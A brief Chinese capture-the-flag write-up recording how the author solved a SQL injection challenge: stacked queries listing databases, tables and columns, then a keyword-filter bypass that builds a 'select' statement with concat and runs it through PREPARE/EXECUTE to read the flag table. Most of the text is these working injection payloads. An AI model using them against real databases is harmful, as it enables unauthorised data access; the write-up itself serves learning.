打开链接,初步判断应该是sql注入
顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入
先1’,报错
再–+,发现被正则过滤,大小写也不行
看了看大佬的wp,堆叠注入(呜,新名词。。。)
inject=1’;show databases;#
inject=1’;show tables;#
看一下这几个表
1’;show columns from words;#
1’;show columns from 1919810931114514;# (字符串为表名操作时要加反引号)
1’;show columns from hahahah;#
最后发现在1919810931114514这个表里
然后用concat绕过
1’;use supersqli;set @sql=concat(‘s’,'elect * from 1919810931114514');PREPARE pre FROM @sql;EXECUTE pre;–+
(这个牛批)
得到了flag
//知识基础太弱,sql注入不会。。。
2020.7.24 公瑾